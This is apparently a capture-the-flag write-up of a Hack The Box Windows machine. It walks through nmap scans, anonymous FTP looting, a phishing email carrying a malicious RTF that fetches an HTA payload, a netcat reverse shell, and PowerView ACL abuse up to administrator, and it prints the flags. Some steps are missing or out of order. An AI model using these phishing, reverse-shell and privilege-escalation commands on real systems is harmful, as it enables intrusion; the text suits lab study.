As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Mon Sep 12 22:07:39 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.77
Nmap scan report for 10.10.10.77
Host is up (0.044s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
# Nmap done at Mon Sep 12 22:08:06 2022 -- 1 IP address (1 host up) scanned in 26.56 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p21,22,25 10.10.10.77 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Mon Sep 12 22:10:40 2022 as: nmap -sCV -p21,22,25 -oN targeted 10.10.10.77
Nmap scan report for 10.10.10.77
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18 12:19AM <DIR> documents
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.92%I=7%D=9/12%Time=631F924A%P=x86_64-pc-linux-gnu%r(NULL
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20S
SF:ervice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%
SF:r(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EH
SF:LO\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n"
SF:)%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
SF:\n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20
SF:sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\
SF:r\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x
SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad
SF:\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comma
SF:nds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVer
SF:sionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusReq
SF:uestTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"2
SF:20\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20
SF:Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
SF:n")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerbero
SF:s,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mai
SF:l\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20re
SF:ady\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n50
SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
SF:x20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")
SF:%r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindRe
SF:q,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Ma
SF:il\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n5
SF:03\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of
SF:\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\
SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequenc
SF:e\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\
SF:x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x2
SF:0commands\r\n");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 12 22:13:32 2022 -- 1 IP address (1 host up) scanned in 171.82 seconds
Anonymous login is enabled in the FTP server.
ftp 10.10.10.77
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:alfa8sa): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
Inside the FTP server there is one directory called documents with some files.
ftp> ls documents
229 Entering Extended Passive Mode (|||41002|)
125 Data connection already open; Transfer starting.
05-29-18 12:19AM 2047 AppLocker.docx
05-28-18 02:01PM 124 readme.txt
10-31-17 10:13PM 14581 Windows Event Forwarding.docx
226 Transfer complete.
Let's transfer all of them to our current machine.
ftp> get AppLocker.docx
ftp> get readme.txt
ftp> get Windows\ Event\ Forwarding.docx
The readme.txt file says that someone is checking for any .rtf files in his email.
cat readme.txt
please email me any rtf format procedures - I'll review and convert.
new format / converted documents will be saved here.
The AppLocker.txt has some instructions for AppLocker procedure.
docx2txt AppLocker.docx; cat AppLocker.txt
AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.
The Windows Event Forwarding.docx seems to be corrupted, so we can not see it's content.
docx2txt Windows\ Event\ Forwarding.docx
Failed to extract required information from <Windows Event Forwarding.docx>!
But, we can see an email in the metadata.
exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number : 12.44
File Name : Windows Event Forwarding.docx
Directory : .
File Size : 15 kB
File Modification Date/Time : 2017:10:31 22:13:23+01:00
File Access Date/Time : 2022:09:13 00:41:48+02:00
File Inode Change Date/Time : 2022:09:13 00:41:48+02:00
File Permissions : -rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x82872409
Zip Compressed Size : 385
Zip Uncompressed Size : 1422
Zip File Name : [Content_Types].xml
Creator : nico@megabank.com
Revision Number : 4
Create Date : 2017:10:31 18:42:00Z
Modify Date : 2017:10:31 18:51:00Z
Template : Normal.dotm
Total Edit Time : 5 minutes
Pages : 2
Words : 299
Characters : 1709
Application : Microsoft Office Word
Doc Security : None
Lines : 14
Paragraphs : 4
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company :
Links Up To Date : No
Characters With Spaces : 2004
Shared Doc : No
Hyperlinks Changed : No
App Version : 14.0000
As por 25 (SMTP) is open, we can check with the smtp-user-enum toot, if the email nico@megabank.com is valid.
On the current directory, we'll have to set a simple HTTP server, so the victim machine can download the malicious.hta file.
python -m http.server 80
Now, set a netcat listener on port 4444 with rlwrap.
rlwrap nc -lvnp 4444
-llisten mode.
-vverbose mode.
-nnumeric-only IP, no DNS resolution.
-p specify the port to listen on.
Finally, we can execute the script with Python2, and generate the malicious.rtf file.
python2 41894.py -M gen -w malicious.rtf -u http://10.10.14.11/malicious.hta
-M generate malicious file only.
-wname of the malicious RTF file.
-u path to the HTAfile.
Generating normal RTF payload.
Generated malicious.rtf successfully
Finally, if send the malicious file to nico@megabank.com.we should be able to get a shell as nico, and we'll be able to grab the user flag.
sendemail -f alfa8sa@megabank.com -t nico@megabank.com -s 10.10.10.77 -m "Open de juicy file" -a malicious.rtf
-fsender email address.
-treceiver email address.
-s SMTP server.
-mmessage to send.
-afile attachment.
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.77] 62436
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
whoami
htb\nico
type \users\nico\desktop\user.txt
fa363aebcfa2c29897a69af385fee971
Privilege Escalation
In the desktop of the user nico, there is a file called cred.xml with some encoded password for the tom user.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
tom@REEL C:\Users\tom>whoami
htb\tom
In the desktop of the tom user there is a directory called AD Audit.
dir \Users\tom\Desktop
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop
05/29/2018 08:57 PM <DIR> .
05/29/2018 08:57 PM <DIR> ..
05/29/2018 09:02 PM <DIR> AD Audit
0 File(s) 0 bytes
3 Dir(s) 15,771,508,736 bytes free
There are a few things inside AD Audit.
dir "\Users\tom\Desktop\AD Audit"
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop\AD Audit
05/29/2018 09:02 PM <DIR> .
05/29/2018 09:02 PM <DIR> ..
05/30/2018 12:44 AM <DIR> BloodHound
05/29/2018 09:02 PM 182 note.txt
1 File(s) 182 bytes
3 Dir(s) 15,771,508,736 bytes free
The note.txt file says that there is no way to gain admin privileges.
type "\Users\tom\Desktop\AD Audit\note.txt"
Inside the BloodHound directory we can see the PowerView.ps1 script.
dir "\Users\tom\Desktop\AD Audit\BloodHound"
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop\AD Audit\BloodHound
05/30/2018 12:44 AM <DIR> .
05/30/2018 12:44 AM <DIR> ..
05/29/2018 08:57 PM <DIR> Ingestors
10/30/2017 11:15 PM 769,587 PowerView.ps1
1 File(s) 769,587 bytes
3 Dir(s) 15,771,508,736 bytes free
And inside the Ingestors directory there are some files and binaries.
dir "\Users\tom\Desktop\AD Audit\BloodHound\Ingestors"
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors
05/29/2018 08:57 PM <DIR> .
05/29/2018 08:57 PM <DIR> ..
11/17/2017 12:50 AM 112,225 acls.csv
10/28/2017 09:50 PM 3,549 BloodHound.bin
10/24/2017 04:27 PM 246,489 BloodHound_Old.ps1
10/24/2017 04:27 PM 568,832 SharpHound.exe
10/24/2017 04:27 PM 636,959 SharpHound.ps1
5 File(s) 1,568,054 bytes
2 Dir(s) 15,771,508,736 bytes free
There is one called acls.csv. Let's transfer it to our local machine. Set an SMB server with impacket.
impacket-smbserver smbFolder $(pwd) -smb2support
Then, copy the acls.csv file to the smbFolder share.
copy acls.csv \\10.10.14.11\smbFolder\
We can see that the file has a lot of information about objects, principals, rights and access control type.
csvtool readable acls.csv
ObjectName ObjectType ObjectGuid PrincipalName PrincipalType ActiveDirectoryRights ACEType AccessControlType IsInherited
Domain Computers@HTB.LOCAL GROUP Domain Admins@HTB.LOCAL GROUP GenericAll AccessAllowed False
Domain Computers@HTB.LOCAL GROUP Account Operators@HTB.LOCAL GROUP GenericAll AccessAllowed False
Domain Computers@HTB.LOCAL GROUP Local System@HTB.LOCAL USER GenericAll AccessAllowed False
...
If we grep for tom, we'll see that it has WriteOwner rights on the claire user.
csvtool readable acls.csv | grep tom
ObjectName ObjectType ObjectGuid PrincipalName PrincipalType ActiveDirectoryRights ACEType AccessControlType IsInherited
...
claire@HTB.LOCAL USER tom@HTB.LOCAL USER WriteOwner AccessAllowed False
This means that tom can change the password of the claire user. We'll need to use PowerView.ps1 to do it. First, open a PowerShell shell.
powershell
Then, import the PowerView.ps1 module located in the BloodHound directory.
Import-Module .\PowerView.ps1
Set tom as the owner of claire ACL.
Set-DomainObjectOwner -identity claire -OwnerIdentity tom
Give the right permissions to change claire passsword.
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
Create a credential $cred with the password alfa8sa123$!.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
claire@REEL C:\Users\claire>whoami
htb\claire
If we grep for claire in the acls.csv file, we'll see that she has WriteDacl rights on the Backup_Admins group.
csvtool readable acls.csv | grep claire
ObjectName ObjectType ObjectGuid PrincipalName PrincipalType ActiveDirectoryRights ACEType AccessControlType IsInherited
...
Backup_Admins@HTB.LOCAL GROUP claire@HTB.LOCAL USER WriteDacl AccessAllowed False
Which means that I can add the user claire to the Backup_Admins group.
net group Backup_Admins claire /add
The command completed successfully.
In order to get the right permissions, you might need to log out, and then log in again. Now, the user claire is in the Backup_Admins group.
net group Backup_Admins
Group name Backup_Admins
Comment
Members
-------------------------------------------------------------------------------
claire ranj
The command completed successfully.
We can see that the Backup_Admins group have full rights on the \users\administrator directory.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
administrator@REEL C:\Users\Administrator>whoami
htb\administrator
administrator@REEL C:\Users\Administrator>type \Users\Administrator\Desktop\root.txt
1018a0331e686176ff4577c728eaf32a
As The email is valid, the idea is to generate a malicious .rtf file, and then send it to the nico@megabank.com email address. There is one python which allow us to create malicious .rtf files. First, we'll have to generate a malicious .hta file with msfvenom, which will send us a reverse shell.
